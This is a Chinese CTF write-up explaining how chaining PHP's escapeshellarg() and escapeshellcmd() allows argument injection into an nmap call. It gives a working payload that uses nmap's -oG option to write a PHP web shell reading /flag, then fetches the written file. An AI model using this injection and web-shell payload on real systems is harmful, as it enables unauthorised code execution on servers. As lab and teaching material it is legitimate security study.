知识点

  • escapeshellarg()+escapeshellcmd() 之殇
  • nmap -oG 文件写入

参考链接:

  1. 谈谈escapeshellarg参数绕过和注入的问题:http://www.lmxspace.com/2018/07/16/%E8%B0%88%E8%B0%88escapeshellarg%E5%8F%82%E6%95%B0%E7%BB%95%E8%BF%87%E5%92%8C%E6%B3%A8%E5%85%A5%E7%9A%84%E9%97%AE%E9%A2%98/
  2. PHP escapeshellarg()+escapeshellcmd() 之殇:https://paper.seebug.org/164/

启动靶机

1. 访问题目,直接给出了源码

  1. <?php
  3. if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
  4.     $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
  5. }
  7. if(!isset($_GET['host'])) {
  8.     highlight_file(__FILE__);
  9. } else {
  10.     $host = $_GET['host'];
  11.     $host = escapeshellarg($host);
  12.     $host = escapeshellcmd($host);
  13.     $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
  14.     echo 'you are in sandbox '.$sandbox;
  15.     @mkdir($sandbox);
  16.     chdir($sandbox);
  17.     echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
  18. }

2. PHP escapeshellarg()+escapeshellcmd() 之殇

通过上面的两个函数来进行规则过滤转译,我们的输入会被单引号引起来,且这个漏洞可以使我们逃脱引号的束缚。

这里常见的命令后注入操作如 | & &&都不行,虽然我们通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转移…

这时候就只有想想能不能利用nmap来做些什么了。

3. nmap -oG参数写文件

nmap有一个参数-oG可以实现将命令和结果写到文件。
所以我们可以控制自己的输入写入文件,这里我们可以写入一句话木马链接,也可以直接命令 cat flag

  1. ?host=' <?php echo `cat /flag`;?> -oG test.php '

image.png

  1. http://ip/741bb7a47516059532bde7fe4d22a820/test.php

image.png
拿到flag

  1. flag{9c422740-0622-4270-b0fc-023c3674aded}